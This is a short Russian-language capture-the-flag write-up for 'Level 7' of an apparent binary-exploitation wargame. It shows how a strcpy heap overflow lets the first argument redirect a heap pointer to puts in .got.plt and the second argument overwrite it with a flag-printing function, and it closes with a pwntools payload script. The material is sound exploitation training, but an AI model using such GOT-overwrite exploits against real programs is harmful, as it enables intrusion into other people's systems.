# Level 7

### 1. Из-за вызова уязвимой функции strcpy, есть возможность переписать данные в куче
```c
  strcpy(*(v6 + 1), argv[1]);
  strcpy(*(v5 + 1), argv[2]);
```
### 2. В первом аргументе подаем строку и переписываем адрес следующего аллоцированного чанка на адрес функции puts в секции .got.plt
### 3. Благодаря этому второй аргумент перепишет адрес puts на адрес функции печатающей флаг.

```c
int m()
{
  time_t v0; // eax

  v0 = time(0);
  return printf("%s - %d\n", c, v0); // в массиве с[] записан флаг
}
```

### 4. Рассчитываем расстояние, которое потребуется, чтобы достать до указателя в куче и формируем пейлоад.
``` python
from pwn import *
import sys

m_addr = p32(0x080484F4)
puts_addr = p32(0x08049928)

first_arg = b"a" * 20
first_arg += puts_addr
first_arg = f"`echo -ne '{repr(first_arg)[2:-1]}'`"

second_arg = f"`echo -ne '{repr(m_addr)[2:-1]}'`"

print(f"./level7 {first_arg} {second_arg}")
```